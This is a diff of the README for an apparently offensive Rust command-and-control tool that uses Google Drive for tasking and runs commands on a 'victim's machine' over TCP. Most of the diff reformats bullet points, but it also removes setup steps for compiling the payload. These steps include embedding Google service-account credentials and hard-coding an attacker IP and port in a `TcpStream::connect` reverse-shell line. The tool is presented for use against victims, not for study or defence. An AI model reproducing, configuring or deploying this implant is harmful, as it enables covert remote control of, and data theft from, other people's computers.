DannyPenten/Rust-DriveC2/README.md

 - Command execution on the victim's machine through a TCP connection
 - Works with a Google Service Account for authentication
 # Prerequisites
-Google Service Account: You need to create a Google Cloud project, enable the Google Drive API, and download the Service Account credentials (JSON).
+- Google Service Account: You need to create a Google Cloud project, enable the Google Drive API, and download the Service Account credentials (JSON).
-Rust Toolchain: Ensure you have Rust installed.
+- Rust Toolchain: Ensure you have Rust installed.
 If not, install it from Rust's official site.
-How to Use
-1. Setup
-Add the Google Service Account JSON file to the src/ directory of the Rust project (used in main.rs).
-Update main.rs with your Google Drive folder ID.
-2. Compiling the Rust Payload
-Before compiling, on src/main.rs in payload folder, change this:
-- folder ID on ``` const FOLDER_ID: &str = "INPUT YOUR GGDRIVE ID"; ```
-- drop your json file in /src and put your json name in ```let service_account_json = include_str!("yourjsonfilename.json");```
-- your attacker's machine ip + port number at ```let mut stream = TcpStream::connect("192.168.247.131:4444").expect("Failed to connect");```

 ## Dependencies 📦

 This Rust project relies on the following dependencies: